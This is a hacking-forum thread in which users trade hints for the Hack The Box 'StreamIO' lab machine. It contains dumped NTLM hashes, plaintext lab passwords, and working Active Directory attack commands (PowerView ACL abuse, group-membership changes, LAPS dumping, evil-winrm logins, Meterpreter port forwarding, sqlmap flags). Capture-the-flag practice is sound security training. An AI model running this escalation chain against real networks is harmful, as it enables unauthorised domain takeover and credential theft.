Return to forum

NoobHTB · June 8, 2022 at 3:25 AM

(June 8, 2022, 02:20 AM)yumi Wrote:

(June 7, 2022, 03:00 AM)NoobHTB Wrote:

(June 7, 2022, 02:27 AM)Himitsu Wrote: Little gift:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:91ef1f7fc4ac34eb666ad61bee4fd816:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5f5142aae3cce656285ce4504605dec1:::
JDgodd:1104:aad3b435b51404eeaad3b435b51404ee:8846130392c4169cb552fe5b73b046af:::
Martin:1105:aad3b435b51404eeaad3b435b51404ee:a9347432fb0034dd1814ca794793d377:::
nikk37:1106:aad3b435b51404eeaad3b435b51404ee:17a54d09dd09920420a6cb9b78534764:::
yoshihide:1107:aad3b435b51404eeaad3b435b51404ee:6d21f46be3697ba16b6edef7b3399bf4:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:b043edae34baa61e727e92f0a89dc161:::

HTB: StreamIO – Syn's writeups (synisl33t.com)
what is the password of this writeup? I tried, but it's not work

Administrator:500:aad3b435b51404eeaad3b435b51404ee:91ef1f7fc4ac34eb666ad61bee4fd816:::

Try again worked now

Thanks for letting me know

buggy · June 12, 2022 at 6:19 PM

where is the root.txt

OperationBlueSun · June 13, 2022 at 10:18 PM

(June 7, 2022, 03:39 PM)pentiumgold Wrote: Someone please elaborate on the initial foothold. How to find the user `yoshihide`. In my case sqlmap shows 404 because of http2

you need to add the --force-ssl flag to sqlmap

h4ck3r1234 · June 17, 2022 at 5:36 AM

(June 5, 2022, 02:01 PM)Exa Wrote: Forwarding port 1433, there is a streamio_backup database.

How did you get backup streamio database?

hewjwej · June 25, 2022 at 7:45 AM

I can't get bloodhound working... does anyone have the content that it shows for the attack vector??

bothack · June 27, 2022 at 11:40 AM

(June 6, 2022, 04:07 PM)GatoGamer1155 Wrote: In summary

Download powerview.ps1 module to local computer
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
Connection to nikk37 with evil-winrm
evil-winrm -i streamio.htb -u nikk37 -p '[email protected]'
Upload and import module to the victim machine
upload PowerView.ps1
Import-Module .\PowerView.ps1
Add to JDgodd to get access with laps
$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('streamio\JDgodd', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Core Staff" -principalidentity "streamio\JDgodd"
Add-DomainGroupMember -identity "Core Staff" -members "streamio\JDgodd" -credential $Cred
On local computer download and run lapsdumper
wget https://raw.githubusercontent.com/n00py/LAPSDumper/main/laps.py
python3 laps.py -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r' -d streamio.htb
[***laps doesn't work????***]

With the password that results connect with evil-winrm as administrator
evil-winrm -i streamio.htb -u Administrator -p '{passlaps.py}'

(June 6, 2022, 06:47 PM)Exa Wrote:
(June 6, 2022, 06:15 PM)fironeDerbert Wrote: How to do the port forwarding to 1433 step by step ?

I used Meterpreter:
portfwd add -l 1433 -p 1433 -r 127.0.0.1

Can you help me there****

python3 laps.py -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r' -d streamio.htb

bothack · June 29, 2022 at 3:27 PM

Finally After 2 Days... Thank you guyz for your support. ❣️

fironeDerbert · July 30, 2022 at 4:13 AM

If anyone need help on this machine:

https://hack-the-flag.herokuapp.com/machines/474

Enjoy !

nbdknws · July 31, 2022 at 8:25 AM

(June 7, 2022, 03:39 PM)pentiumgold Wrote: Someone please elaborate on the initial foothold. How to find the user `yoshihide`. In my case sqlmap shows 404 because of http2

If you use sqlmap with -v6 flag you will see that it is trying to connect to port 80, use --force-ssl option to fix it

Vroo · August 2, 2022 at 9:32 AM

Here is an unlocked writeup for you guyes hope you enjoy it !!!

Link : https://anonfiles.com/Kfj9s91cy9